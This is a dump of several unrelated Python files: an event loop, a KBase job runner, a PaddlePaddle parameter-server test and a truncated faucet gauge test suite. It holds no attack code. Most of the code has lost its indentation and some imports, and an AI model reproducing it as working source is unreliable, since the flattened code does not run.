import selectors
import socket
import threading
from typing import Optional, Union
from bluefoglite.common import const
from bluefoglite.common.logger import logging
class Handler(abc.ABC):
@abc.abstractmethod
def handleEvent(self, event: int):
raise NotImplementedError
# TODO(ybc) make this class singleton?
class EventLoop:
def __init__(self):
self.sel = selectors.DefaultSelector()
self.done = False # Python assignment to simple variable is "atomic"
self.running_thread = None
self.closed = False
self._cv = threading.Condition()
self.error: Optional[Exception] = None
def __del__(self):
self.close()
def run(self):
if self.running_thread is not None:
print("Event Loop is already running")
return
# print('start running loop')
self.running_thread = threading.Thread(
target=EventLoop._run, args=(self,), daemon=True
)
self.running_thread.start()
def is_alive(self) -> bool:
if self.running_thread is None:
return False
return self.running_thread.is_alive()
def _run(self):
while not self.done:
# self._cv.notify_all()
# Find a better timeout choice? for closing the loop.
events_list = self.sel.select(const.EVENT_LOOP_TIMEOUT)
for key, event in events_list:
try:
# key is the SelectorKey instance corresponding to a ready file object.
# SelectorKey is a namedtuple: (fileobj, fd, events, data)
# We force the data to be the instance of abstract class Handler.
key.data.handleEvent(event)
# TODO Handle the error different with specified type
except Exception as e: # pylint: disable=broad-except
self.error = e
break
logging.debug("_run: %s", self.done)
# TODO: properly propagate the error from the run thread to the main thread?
if self.error:  # stopped unexpectedly
self.sel.close()
break
def register(self, fd: Union[int, socket.socket], event: int, handler: Handler):
self.sel.register(fd, event, handler)
def modify(self, fd: Union[int, socket.socket], event: int, handler: Handler):
self.sel.modify(fd, event, handler)
def unregister(self, fd: Union[int, socket.socket]):
self.sel.unregister(fd)
# make sure `unregister` returned after the loop ticked?
# self._cv.acquire()
# self._cv.wait()
# self._cv.release()
def close(self):
if self.closed:
return
self.done = True
if self.running_thread is not None:
    self.running_thread.join()
self.sel.close()
self.closed = True
if self.error:
raise self.error
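# Illustrative sketch only (not part of the original module): a minimal handler
# driven through the loop via a socketpair. EchoHandler and the sockets below
# are made up for this example.
if __name__ == "__main__":
    import time

    class EchoHandler(Handler):
        def __init__(self, sock):
            self.sock = sock

        def handleEvent(self, event: int):
            if event & selectors.EVENT_READ:
                print("received:", self.sock.recv(1024))

    left, right = socket.socketpair()
    loop = EventLoop()
    loop.register(right, selectors.EVENT_READ, EchoHandler(right))
    loop.run()
    left.sendall(b"ping")
    time.sleep(0.5)  # give the loop a tick to dispatch the read event
    loop.unregister(right)
    loop.close()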
|
JobRunner.py
|
import logging
import os
import signal
import socket
from multiprocessing import Process, Queue
from queue import Empty
from socket import gethostname
from time import sleep as _sleep
from time import time as _time
import requests
from clients.authclient import KBaseAuth
from clients.execution_engine2Client import execution_engine2 as EE2
from .CatalogCache import CatalogCache
from .MethodRunner import MethodRunner
from .SpecialRunner import SpecialRunner
from .callback_server import start_callback_server
from .exceptions import CantRestartJob
from .logger import Logger
from .provenance import Provenance
logging.basicConfig(format="%(created)s %(levelname)s: %(message)s", level=logging.INFO)
class JobRunner(object):
"""
This class provides the mechanisms to launch a KBase job
on a container runtime. It handles starting the callback service
to support subjobs and provenance calls.
"""
def __init__(self, config, ee2_url, job_id, token, admin_token, debug=False):
"""
inputs: config dictionary, EE2 URL, Job id, Token, Admin Token
"""
self.ee2 = EE2(url=ee2_url, timeout=60)
self.logger = Logger(ee2_url, job_id, ee2=self.ee2)
self.token = token
self.client_group = os.environ.get("CLIENTGROUP", "None")
self.bypass_token = os.environ.get("BYPASS_TOKEN", True)
self.admin_token = admin_token
self.config = self._init_config(config, job_id, ee2_url)
self.hostname = gethostname()
self.auth = KBaseAuth(config.get("auth-service-url"))
self.job_id = job_id
self.workdir = config.get("workdir", "/mnt/awe/condor")
self.jr_queue = Queue()
self.callback_queue = Queue()
self.prov = None
self._init_callback_url()
self.debug = debug
self.mr = MethodRunner(
self.config, job_id, logger=self.logger, debug=self.debug
)
self.sr = SpecialRunner(self.config, job_id, logger=self.logger)
self.cc = CatalogCache(config)
self.max_task = config.get("max_tasks", 20)
self.cbs = None
signal.signal(signal.SIGINT, self.shutdown)
def _init_config(self, config, job_id, ee2_url):
"""
Initialize config dictionary
"""
config["hostname"] = gethostname()
config["job_id"] = job_id
config["ee2_url"] = ee2_url
token = self.token
config["token"] = token
config["admin_token"] = self.admin_token
return config
def _check_job_status(self):
"""
returns True if the job is still okay to run.
"""
try:
status = self.ee2.check_job_canceled({"job_id": self.job_id})
except Exception as e:
self.logger.error(
f"Warning: Job cancel check failed due to {e}. However, the job will continue to run."
)
return True
if status.get("finished", False):
return False
return True
def _init_workdir(self):
""" Check to see for existence of scratch dir: /mnt/awe/condor or /cdr/ """
if not os.path.exists(self.workdir):
self.logger.error("Missing workdir")
raise OSError("Missing Working Directory")
def _get_cgroup(self):
""" Examine /proc/PID/cgroup to get the cgroup the runner is using """
if os.environ.get("NO_CGROUP"):
return None
pid = os.getpid()
cfile = "/proc/{}/cgroup".format(pid)
# TODO REMOVE THIS OR FIGURE OUT FOR TESTING WHAT TO DO ABOUT THIS
if not os.path.exists(cfile):
raise Exception(f"Couldn't find cgroup {cfile}")
else:
with open(cfile) as f:
for line in f:
if line.find("htcondor") > 0:
items = line.split(":")
if len(items) == 3:
return items[2].strip()
raise Exception(f"Couldn't parse out cgroup from {cfile}")
def _submit_special(self, config, job_id, job_params):
"""
Handler for methods such as CWL, WDL and HPC
"""
(module, method) = job_params["method"].split(".")
self.logger.log("Submit %s as a %s:%s job" % (job_id, module, method))
self.sr.run(
config,
job_params,
job_id,
callback=self.callback_url,
fin_q=[self.jr_queue],
)
def _submit(self, config, job_id, job_params, subjob=True):
(module, method) = job_params["method"].split(".")
service_ver = job_params.get("service_ver")
if service_ver is None:
service_ver = job_params.get("context", {}).get("service_ver")
# TODO Fail gracefully if this step fails. For example, setting service_ver='fake'
module_info = self.cc.get_module_info(module, service_ver)
git_url = module_info["git_url"]
git_commit = module_info["git_commit_hash"]
if not module_info["cached"]:
fstr = "Running module {}: url: {} commit: {}"
self.logger.log(fstr.format(module, git_url, git_commit))
else:
version = module_info["version"]
f = "WARNING: Module {} was already used once for this job. "
f += "Using cached version: url: {} "
f += "commit: {} version: {} release: release"
self.logger.error(f.format(module, git_url, git_commit, version))
vm = self.cc.get_volume_mounts(module, method, self.client_group)
config["volume_mounts"] = vm
action = self.mr.run(
config,
module_info,
job_params,
job_id,
callback=self.callback_url,
subjob=subjob,
fin_q=self.jr_queue,
)
self._update_prov(action)
def _cancel(self):
self.mr.cleanup_all(debug=self.debug)
def shutdown(self, sig, bt):
print("Recieved an interrupt")
# Send a cancel to the queue
self.jr_queue.put(["cancel", None, None])
def _watch(self, config):
# Run a thread to check for expired token
# Run a thread for 7 day max job runtime
cont = True
ct = 1
exp_time = self._get_token_lifetime(config) - 600
while cont:
try:
req = self.jr_queue.get(timeout=1)
if _time() > exp_time:
err = "Token has expired"
self.logger.error(err)
self._cancel()
return {"error": err}
if req[0] == "submit":
if ct > self.max_task:
self.logger.error("Too many subtasks")
self._cancel()
return {"error": "Canceled or unexpected error"}
if req[2].get("method").startswith("special."):
self._submit_special(
config=config, job_id=req[1], job_params=req[2]
)
else:
self._submit(config=config, job_id=req[1], job_params=req[2])
ct += 1
elif req[0] == "finished_special":
job_id = req[1]
self.callback_queue.put(["output", job_id, req[2]])
ct -= 1
elif req[0] == "finished":
subjob = True
job_id = req[1]
if job_id == self.job_id:
subjob = False
output = self.mr.get_output(job_id, subjob=subjob)
self.callback_queue.put(["output", job_id, output])
ct -= 1
if not subjob:
if ct > 0:
err = "Orphaned containers may be present"
self.logger.error(err)
return output
elif req[0] == "cancel":
self._cancel()
return {}
except Empty:
pass
if ct == 0:
print("Count got to 0 without finish")
# This shouldn't happen
return
# Run cancellation / finish job checker
if not self._check_job_status():
self.logger.error("Job canceled or unexpected error")
self._cancel()
_sleep(5)
return {"error": "Canceled or unexpected error"}
def _init_callback_url(self):
# Find a free port and Start up callback server
if os.environ.get("CALLBACK_IP") is not None:
self.ip = os.environ.get("CALLBACK_IP")
self.logger.log("Callback IP provided ({})".format(self.ip))
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("gmail.com", 80))
self.ip = s.getsockname()[0]
s.close()
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("", 0))
self.port = sock.getsockname()[1]
sock.close()
url = "http://{}:{}/".format(self.ip, self.port)
self.logger.log("Job runner recieved Callback URL {}".format(url))
self.callback_url = url
def _update_prov(self, action):
self.prov.add_subaction(action)
self.callback_queue.put(["prov", None, self.prov.get_prov()])
def _validate_token(self):
# Validate token and get user name
try:
user = self.auth.get_user(self.config["token"])
except Exception as e:
self.logger.error("Token validation failed")
raise Exception(e)
return user
def _get_token_lifetime(self, config):
try:
url = config.get("auth-service-url-v2")
logging.info(f"About to get token lifetime from {url} for user token")
header = {"Authorization": self.config["token"]}
resp = requests.get(url, headers=header).json()
return resp["expires"]
except Exception as e:
self.logger.error("Failed to get token lifetime")
raise e
def _retry_finish(self, finish_job_params, success):
"""
In case of failure to finish, retry once
"""
if success:
if (
"job_output" not in finish_job_params
or finish_job_params["job_output"] is None
):
finish_job_params["job_output"] = {}
try:
self.ee2.finish_job(finish_job_params)
except Exception:
_sleep(30)
self.ee2.finish_job(finish_job_params)
def run(self):
"""
This method starts the actual run. This is a blocking operation and
will not return until the job finishes or encounters an error.
This method also handles starting up the callback server.
"""
running_msg = f"Running job {self.job_id} ({os.environ.get('CONDOR_ID')}) on {self.hostname} ({self.ip}) in {self.workdir}"
self.logger.log(running_msg)
logging.info(running_msg)
cg_msg = "Client group: {}".format(self.client_group)
self.logger.log(cg_msg)
logging.info(cg_msg)
# Check to see if the job was run before or canceled already.
# If so, log it
logging.info("About to check job status")
if not self._check_job_status():
error_msg = "Job already run or terminated"
self.logger.error(error_msg)
logging.error(error_msg)
raise CantRestartJob(error_msg)
# Get job inputs from ee2 db
# Config is not stored in the job anymore; it's a server-wide config
# I don't think this matters for reproducibility
logging.info("About to get job params and config")
try:
job_params = self.ee2.get_job_params({"job_id": self.job_id})
except Exception as e:
self.logger.error("Failed to get job parameters. Exiting.")
raise e
try:
config = self.ee2.list_config()
except Exception as e:
self.logger.error("Failed to config . Exiting.")
raise e
config["job_id"] = self.job_id
self.logger.log(
f"Server version of Execution Engine: {config.get('ee.server.version')}"
)
# Update job as started and log it
logging.info("About to start job")
try:
self.ee2.start_job({"job_id": self.job_id})
except Exception as e:
self.logger.error(
"Job already started once. Job restarts are not currently supported"
)
raise e
logging.info("Initing work dir")
self._init_workdir()
config["workdir"] = self.workdir
config["user"] = self._validate_token()
config["cgroup"] = self._get_cgroup()
logging.info("Setting provenance")
self.prov = Provenance(job_params)
# Start the callback server
logging.info("Starting callback server")
cb_args = [
self.ip,
self.port,
self.jr_queue,
self.callback_queue,
self.token,
self.bypass_token,
]
self.cbs = Process(target=start_callback_server, args=cb_args)
self.cbs.start()
# Submit the main job
self.logger.log(f"Job is about to run {job_params.get('app_id')}")
# TODO Try except for when submit or watch failure happens and correct finishjob call
self._submit(
config=config, job_id=self.job_id, job_params=job_params, subjob=False
)
output = self._watch(config)
self.cbs.terminate()
self.logger.log("Job is done")
error = output.get("error")
if error:
error_message = "Job output contains an error"
self.logger.error(f"{error_message} {error}")
self._retry_finish(
{"job_id": self.job_id, "error_message": error_message, "error": error},
success=False,
)
else:
self._retry_finish(
{"job_id": self.job_id, "job_output": output}, success=True
)
# TODO: Attempt to clean up any running docker containers
# (if something crashed, for example)
return output
# Run docker or shifter and keep a record of container id and
# subjob container ids
# Run a job shutdown hook
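# Illustrative sketch only (not part of the original module): the runner is built
# with the EE2 endpoint and job credentials, then run() blocks until the job is
# done. Every value below is a placeholder.
if __name__ == "__main__":
    runner = JobRunner(
        config={"workdir": "/mnt/awe/condor", "auth-service-url": "<auth-url>"},
        ee2_url="<ee2-url>",
        job_id="<job-id>",
        token="<user-token>",
        admin_token="<admin-token>",
    )
    final_output = runner.run()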
|
test_lookup_remote_table_op.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import signal
import time
import unittest
from multiprocessing import Process
import numpy as np
import paddle.fluid as fluid
import paddle.fluid.core as core
from paddle.fluid.op import Operator
from paddle.fluid.framework import Program, program_guard
def run_pserver(pserver_id, use_cuda, sync_mode):
scope = fluid.core.Scope()
program = Program()
with fluid.scope_guard(scope):
with program_guard(program, startup_program=Program()):
# create table parameter in scope
place = fluid.CUDAPlace(0) if use_cuda else fluid.CPUPlace()
# create and initialize Param Variable
param = scope.var('table').get_tensor()
param_array = np.ones((10, 8)).astype("float32")
for i in range(len(param_array)):
param_array[i] *= param_array[i] * i + pserver_id * 10
param.set(param_array, place)
optimize_block = program._create_block(program.global_block().idx)
program.global_block().append_op(
type="listen_and_serv",
inputs={'X': []},
outputs={},
attrs={
"optimize_blocks": [optimize_block],
"endpoint": '127.0.0.1:0',
"Fanin": 1,
"sync_mode": True,
"grad_to_block_id": []
})
exe = fluid.Executor(place)
exe.run(program)
class TestListenAndServOp(unittest.TestCase):
def setUp(self):
self.ps_timeout = 5
def _start_pserver(self, pserver_id, use_cuda, sync_mode, pserver_func):
p = Process(target=pserver_func, args=(pserver_id, use_cuda, sync_mode))
p.daemon = True
p.start()
return p
def _wait_ps_ready(self, pid):
start_left_time = self.ps_timeout
sleep_time = 0.5
while True:
assert start_left_time >= 0, "wait ps ready failed"
time.sleep(sleep_time)
try:
# the listen_and_serv_op would touch a file which contains the listen port
# on the /tmp directory until it was ready to process all the RPC call.
os.stat("/tmp/paddle.%d.port" % pid)
return
except os.error:
start_left_time -= sleep_time
def _get_pserver_port(self, pid):
with open("/tmp/paddle.%d.port" % pid, 'r') as f:
port = int(f.read().strip())
return port
def _run_lookup_table_op_one_pserver(self, place, port):
scope = fluid.core.Scope()
program = Program()
with fluid.scope_guard(scope):
with program_guard(program, startup_program=Program()):
# create and initialize Param Variable
param = scope.var('W').get_tensor()
param_array = np.full((10, 8), 1.0).astype("float32")
param.set(param_array, place)
ids = scope.var('Ids').get_tensor()
ids_array = np.array([[1], [2], [5]]).astype("int64")
ids.set(ids_array, place)
ids_lod = [[0, 1, 2, 3]]
ids.set_lod(ids_lod)
out = scope.var('Out').get_tensor()
emaps = ['127.0.0.1:' + str(port)]
table_names = ['table']
height_sections = [10]
# create and run lookup_table operator
lookup_table_op = Operator(
"lookup_table",
W='W',
Ids='Ids',
Out='Out',
remote_prefetch=True,
epmap=emaps,
table_names=table_names,
height_sections=height_sections)
lookup_table_op.run(scope, place)
# get and compare result
result_array = np.array(out)
self.assertEqual(out.lod(), ids_lod)
self.assertEqual(list(result_array.shape), [len(ids_array), 8])
for i in range(len(ids_array)):
id = ids_array[i][0]
self.assertTrue((result_array[i] == id).all())
def _run_lookup_table_op_two_pserver(self, place, port0, port1):
scope = fluid.core.Scope()
program = Program()
with fluid.scope_guard(scope):
with program_guard(program, startup_program=Program()):
# create and initialize Param Variable
param = scope.var('W').get_tensor()
param_array = np.full((10, 8), 1.0).astype("float32")
param.set(param_array, place)
ids = scope.var('Ids').get_tensor()
ids_array = np.array([[1], [2], [11], [13]]).astype("int64")
ids.set(ids_array, place)
ids_lod = [[0, 2, 3, 4]]
ids.set_lod(ids_lod)
out = scope.var('Out').get_tensor()
emaps = ['127.0.0.1:' + str(port0), '127.0.0.1:' + str(port1)]
table_names = ['table', 'table']
height_sections = [10, 20]
# create and run lookup_table operator
lookup_table_op = Operator(
"lookup_table",
W='W',
Ids='Ids',
Out='Out',
remote_prefetch=True,
epmap=emaps,
table_names=table_names,
height_sections=height_sections)
lookup_table_op.run(scope, place)
# get and compare result
result_array = np.array(out)
self.assertEqual(out.lod(), ids_lod)
self.assertEqual(list(result_array.shape), [len(ids_array), 8])
for i in range(len(ids_array)):
id = ids_array[i][0]
self.assertTrue((result_array[i] == id).all())
def test_lookup_remote_table(self):
os.environ['PADDLE_ENABLE_REMOTE_PREFETCH'] = "1"
# run pserver on CPU in sync mode
p0 = self._start_pserver(0, False, True, run_pserver)
self._wait_ps_ready(p0.pid)
port0 = self._get_pserver_port(p0.pid)
p1 = self._start_pserver(1, False, True, run_pserver)
self._wait_ps_ready(p1.pid)
port1 = self._get_pserver_port(p1.pid)
places = [core.CPUPlace()]
if core.is_compiled_with_cuda():
places.append(core.CUDAPlace(0))
for place in places:
self._run_lookup_table_op_one_pserver(place, port0)
self._run_lookup_table_op_two_pserver(place, port0, port1)
# raise SIGTERM to pserver
os.kill(p0.pid, signal.SIGINT)
p0.join()
os.kill(p1.pid, signal.SIGINT)
p1.join()
if __name__ == '__main__':
unittest.main()
|
test_gauge.py
|
"""Unit tests for gauge"""
from collections import namedtuple
import random
import re
import shutil
import tempfile
import threading
import time
import os
import unittest
from unittest import mock
from http.server import HTTPServer, BaseHTTPRequestHandler
import yaml
import requests
from requests.exceptions import ConnectionError, ReadTimeout
from ryu.controller.ofp_event import EventOFPMsgBase
from ryu.lib import type_desc
from ryu.lib import hub
from ryu.ofproto import ofproto_v1_3 as ofproto
from ryu.ofproto import ofproto_v1_3_parser as parser
from prometheus_client import CollectorRegistry
from faucet import gauge, gauge_prom, gauge_influx, gauge_pollers, watcher
class QuietHandler(BaseHTTPRequestHandler):
"""Don't log requests."""
def log_message(self, _format, *_args):
pass
def table_by_id(i):
table = mock.Mock()
table_name = mock.PropertyMock(return_value='table' + str(i))
type(table).name = table_name
return table
def create_mock_datapath(num_ports):
"""Mock a datapath by creating mocked datapath ports."""
ports = {}
for i in range(1, num_ports + 1):
port = mock.Mock()
port_name = mock.PropertyMock(return_value='port' + str(i))
type(port).name = port_name
ports[i] = port
datapath = mock.Mock(ports=ports, dp_id=random.randint(1, 5000))
datapath.table_by_id = table_by_id
dp_name = mock.PropertyMock(return_value='datapath')
type(datapath).name = dp_name
return datapath
def start_server(handler):
""" Starts a HTTPServer and runs it as a daemon thread """
server = HTTPServer(('', 0), handler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
return server
def port_state_msg(datapath, port_num, reason, status=0):
""" Create an OFPPortStatus message with random values. """
port = parser.OFPPort(port_num,
'00:00:00:d0:00:0'+ str(port_num),
datapath.ports[port_num].name,
0,
status,
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000)
)
return parser.OFPPortStatus(datapath, reason, port)
def port_stats_msg(datapath):
""" Create an OFPPortStatsReply with random values. """
stats = []
sec = random.randint(1, 10000)
nsec = random.randint(0, 10000)
for port_num in datapath.ports:
port_stats = parser.OFPPortStats(port_num,
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(0, 10000),
random.randint(0, 10000),
random.randint(0, 10000),
random.randint(0, 10000),
random.randint(0, 10000),
random.randint(0, 10000),
random.randint(0, 10000),
random.randint(0, 10000),
sec,
nsec
)
stats.append(port_stats)
return parser.OFPPortStatsReply(datapath, body=stats)
def flow_stats_msg(datapath, instructions):
""" Create an OFPFlowStatsReply with random values. """
matches = generate_all_matches()
flow_stats = parser.OFPFlowStats(random.randint(0, 9),
random.randint(1, 10000),
random.randint(0, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
0,
random.randint(1, 10000),
random.randint(1, 10000),
random.randint(1, 10000),
matches,
instructions
)
return parser.OFPFlowStatsReply(datapath, body=[flow_stats])
def generate_all_matches():
"""
Generate all OpenFlow Extensible Matches (oxm) and return
a single OFPMatch with all of these oxms. The value for each
oxm is the largest value possible for the data type. For
example, the largest number for a 4 bit int is 15.
"""
matches = dict()
for oxm_type in ofproto.oxm_types:
if oxm_type.type == type_desc.MacAddr:
value = 'ff:ff:ff:ff:ff:ff'
elif oxm_type.type == type_desc.IPv4Addr:
value = '255.255.255.255'
elif oxm_type.type == type_desc.IPv6Addr:
value = 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff'
elif isinstance(oxm_type.type, type_desc.IntDescr):
value = 2**oxm_type.type.size - 1
else:
continue
matches[oxm_type.name] = value
return parser.OFPMatch(**matches)
def logger_to_ofp(port_stats):
""" Translates between the logger stat name and the OpenFlow stat name"""
return {'packets_out': port_stats.tx_packets,
'packets_in': port_stats.rx_packets,
'bytes_out' : port_stats.tx_bytes,
'bytes_in' : port_stats.rx_bytes,
'dropped_out' : port_stats.tx_dropped,
'dropped_in' : port_stats.rx_dropped,
'errors_in' : port_stats.rx_errors
}
def get_matches(match_dict):
"""Create a set of match name and value tuples"""
return {(entry['OXMTlv']['field'], entry['OXMTlv']['value']) for entry in match_dict}
def check_instructions(original_inst, logger_inst, test):
"""
Check that the original instructions matches the
instructions from the logger
"""
for inst_type, inst in logger_inst[0].items():
test.assertEqual(original_inst[0].__class__.__name__, inst_type)
for attr_name, attr_val in inst.items():
original_val = getattr(original_inst[0], attr_name)
test.assertEqual(original_val, attr_val)
def compare_flow_msg(flow_msg, flow_dict, test):
"""
Compare the body section of an OFPFlowStatsReply
message to a dict representation of it
"""
for stat_name, stat_val in flow_dict.items():
if stat_name == 'match':
match_set = get_matches(stat_val['OFPMatch']['oxm_fields'])
test.assertEqual(match_set, set(flow_msg.body[0].match.items()))
elif stat_name == 'instructions':
check_instructions(flow_msg.body[0].instructions, stat_val, test)
else:
test.assertEqual(getattr(flow_msg.body[0], stat_name), stat_val)
class PretendInflux(QuietHandler):
"""An HTTP Handler that receives InfluxDB messages."""
def do_POST(self): # pylint: disable=invalid-name
""" Write request contents to the HTTP server,
if there is an output file to write to. """
if hasattr(self.server, 'output_file'):
content_length = int(self.headers['content-length'])
data = self.rfile.read(content_length)
data = data.decode('utf-8')
with open(self.server.output_file, 'w') as log:
log.write(data)
self.send_response(204)
self.end_headers()
class GaugePrometheusTests(unittest.TestCase): # pytype: disable=module-attr
"""Tests the GaugePortStatsPrometheusPoller update method"""
prom_client = gauge_prom.GaugePrometheusClient(reg=CollectorRegistry())
def parse_prom_output(self, output):
"""Parses the port stats from prometheus into a dictionary"""
parsed_output = {}
for line in output.split('\n'):
# discard comments and stats not related to port stats
if line.startswith('#') or not line.startswith(gauge_prom.PROM_PORT_PREFIX):
continue
index = line.find('{')
#get the stat name e.g. of_port_rx_bytes and strip 'of_port_'
prefix = gauge_prom.PROM_PORT_PREFIX + gauge_prom.PROM_PREFIX_DELIM
stat_name = line[0:index].replace(prefix, '')
#get the labels within {}
labels = line[index + 1:line.find('}')].split(',')
for label in labels:
lab_name, lab_val = label.split('=')
lab_val = lab_val.replace('"', '')
if lab_name == 'dp_id':
dp_id = int(lab_val, 16)
elif lab_name == 'port_name':
port_name = lab_val
key = (dp_id, port_name)
stat_val = line.split(' ')[1]
if key not in parsed_output:
parsed_output[key] = []
parsed_output[key].append((stat_name, float(stat_val)))
return parsed_output
def get_prometheus_stats(self, addr, port):
"""Attempts to contact the prometheus server
at the address to grab port stats."""
url = 'http://{}:{}'.format(addr, port)
session = requests.Session()
adapter = requests.adapters.HTTPAdapter(max_retries=10)
session.mount('http://', adapter)
return session.get(url).text
def test_poller(self):
"""Test the update method to see if it pushes port stats"""
datapath = create_mock_datapath(2)
conf = mock.Mock(dp=datapath,
type='',
interval=1,
prometheus_port=9303,
prometheus_addr='localhost',
use_test_thread=True
)
prom_poller = gauge_prom.GaugePortStatsPrometheusPoller(conf, '__name__', self.prom_client)
msg = port_stats_msg(datapath)
prom_poller.update(time.time(), datapath.dp_id, msg)
prom_lines = self.get_prometheus_stats(conf.prometheus_addr, conf.prometheus_port)
prom_lines = self.parse_prom_output(prom_lines)
for port_num, port in datapath.ports.items():
port_stats = msg.body[int(port_num) - 1]
stats = prom_lines[(datapath.dp_id, port.name)]
stats_found = set()
for stat_name, stat_val in stats:
self.assertAlmostEqual(stat_val, getattr(port_stats, stat_name))
stats_found.add(stat_name)
self.assertEqual(stats_found, set(gauge_prom.PROM_PORT_VARS))
def test_port_state(self):
"""Test the update method to see if it pushes port state"""
datapath = create_mock_datapath(2)
conf = mock.Mock(dp=datapath,
type='',
interval=1,
prometheus_port=9303,
prometheus_addr='localhost',
use_test_thread=True
)
prom_poller = gauge_prom.GaugePortStatePrometheusPoller(conf, '__name__', self.prom_client)
reasons = [ofproto.OFPPR_ADD, ofproto.OFPPR_DELETE, ofproto.OFPPR_MODIFY]
for i in range(1, len(conf.dp.ports) + 1):
msg = port_state_msg(conf.dp, i, reasons[i-1])
port_name = conf.dp.ports[i].name
rcv_time = int(time.time())
prom_poller.update(rcv_time, conf.dp.dp_id, msg)
prom_lines = self.get_prometheus_stats(conf.prometheus_addr, conf.prometheus_port)
prom_lines = self.parse_prom_output(prom_lines)
stats = prom_lines[(datapath.dp_id, port_name)]
stats_found = set()
for stat_name, stat_val in stats:
msg_data = msg if stat_name == 'reason' else msg.desc
self.assertAlmostEqual(stat_val, getattr(msg_data, stat_name))
stats_found.add(stat_name)
self.assertEqual(stats_found, set(gauge_prom.PROM_PORT_STATE_VARS))
def test_flow_stats(self):
"""Check the update method of the GaugeFlowTablePrometheusPoller class"""
datapath = create_mock_datapath(2)
conf = mock.Mock(dp=datapath,
type='',
interval=1,
prometheus_port=9303,
prometheus_addr='localhost',
use_test_thread=True
)
prom_poller = gauge_prom.GaugeFlowTablePrometheusPoller(conf, '__name__', self.prom_client)
rcv_time = int(time.time())
instructions = [parser.OFPInstructionGotoTable(1)]
msg = flow_stats_msg(conf.dp, instructions)
prom_poller.update(rcv_time, conf.dp.dp_id, msg)
class GaugeInfluxShipperTest(unittest.TestCase): # pytype: disable=module-attr
"""Tests the InfluxShipper"""
def create_config_obj(self, port=12345):
"""Create a mock config object that contains the necessary InfluxDB config"""
conf = mock.Mock(influx_host='localhost',
influx_port=port,
influx_user='gauge',
influx_pwd='',
influx_db='gauge',
influx_timeout=10
)
return conf
def get_values(self, dict_to_unpack):
"""Get all the values from a nested dictionary"""
values = []
for value in dict_to_unpack.values():
if isinstance(value, dict):
values.extend(self.get_values(value))
else:
values.append(value)
return values
def test_ship_success(self):
"""Checks that the shipper successsfully connects
to a HTTP server when the points are shipped"""
try:
server = start_server(PretendInflux)
shipper = gauge_influx.InfluxShipper()
shipper.conf = self.create_config_obj(server.server_port)
points = [{'measurement': 'test_stat_name', 'fields' : {'value':1}},]
shipper.ship_points(points)
except (ConnectionError, ReadTimeout) as err:
self.fail("Code threw an exception: {}".format(err))
finally:
server.socket.close()
server.shutdown()
def test_ship_connection_err(self):
"""Checks that even when there is a connection error,
there is no exception thrown"""
try:
shipper = gauge_influx.InfluxShipper()
shipper.conf = self.create_config_obj()
shipper.logger = mock.Mock()
points = [{'measurement': 'test_stat_name', 'fields' : {'value':1}},]
shipper.ship_points(points)
except (ConnectionError, ReadTimeout) as err:
self.fail("Code threw an exception: {}".format(err))
def test_ship_no_config(self):
"""Check that no exceptions are thrown when
there is no config"""
try:
shipper = gauge_influx.InfluxShipper()
points = [{'measurement': 'test_stat_name', 'fields' : {'value':1}},]
shipper.ship_points(points)
except (ConnectionError, ReadTimeout) as err:
self.fail("Code threw an exception: {}".format(err))
def test_point(self):
"""Checks that the points produced still have the variables given to it"""
shipper = gauge_influx.InfluxShipper()
dp_name = 'faucet-1'
port_name = 'port1.0.1'
rcv_time = int(time.time())
stat_name = 'test_stat_name'
#max uint64 number
stat_val = 2**64 - 1
port_point = shipper.make_port_point(dp_name, port_name, rcv_time, stat_name, stat_val)
values = {dp_name, port_name, rcv_time, stat_name}
port_vals = set(self.get_values(port_point))
port_vals_stat = port_vals.difference(values)
self.assertEqual(len(port_vals_stat), 1)
self.assertAlmostEqual(port_vals_stat.pop(), stat_val)
tags = {'dp_name': dp_name, 'port_name': port_name}
point = shipper.make_point(tags, rcv_time, stat_name, stat_val)
point_vals = set(self.get_values(point))
point_vals_stat = point_vals.difference(values)
self.assertEqual(len(point_vals_stat), 1)
self.assertAlmostEqual(point_vals_stat.pop(), stat_val)
class GaugeInfluxUpdateTest(unittest.TestCase): # pytype: disable=module-attr
"""Test the Influx loggers update methods"""
server = None
def setUp(self):
""" Starts up an HTTP server to mock InfluxDB.
Also opens a new temp file for the server to write to """
self.server = start_server(PretendInflux)
self.temp_fd, self.server.output_file = tempfile.mkstemp()
def tearDown(self):
""" Close the temp file (which should delete it)
and stop the HTTP server """
os.close(self.temp_fd)
os.remove(self.server.output_file)
self.server.socket.close()
self.server.shutdown()
def create_config_obj(self, datapath):
"""Create a mock config object that contains the necessary InfluxDB config"""
conf = mock.Mock(influx_host='localhost',
influx_port=self.server.server_port,
influx_user='gauge',
influx_pwd='',
influx_db='gauge',
influx_timeout=10,
interval=5,
dp=datapath
)
return conf
@staticmethod
def parse_key_value(dictionary, kv_list):
"""
When given a list consisting of strings such as: 'key1=val1',
add to the dictionary as dictionary['key1'] = 'val1'.
Ignore entries in the list which do not contain '='
"""
for key_val in kv_list:
if '=' in key_val:
key, val = key_val.split('=')
try:
val = float(val)
val = int(val)
except ValueError:
pass
dictionary[key] = val
def parse_influx_output(self, output_to_parse):
"""
Parse the output from the mock InfluxDB server
The usual layout of the output is:
measurement,tag1=val1,tag2=val2 field1=val3 timestamp
The tags are separated with a comma and the fields
are separated with a space. The measurement always
appears first, and the timestamp is always last
"""
influx_data = dict()
tags = output_to_parse.split(',')
fields = tags[-1].split(' ')
tags[-1] = fields[0]
influx_data['timestamp'] = int(fields[-1])
fields = fields[1:-1]
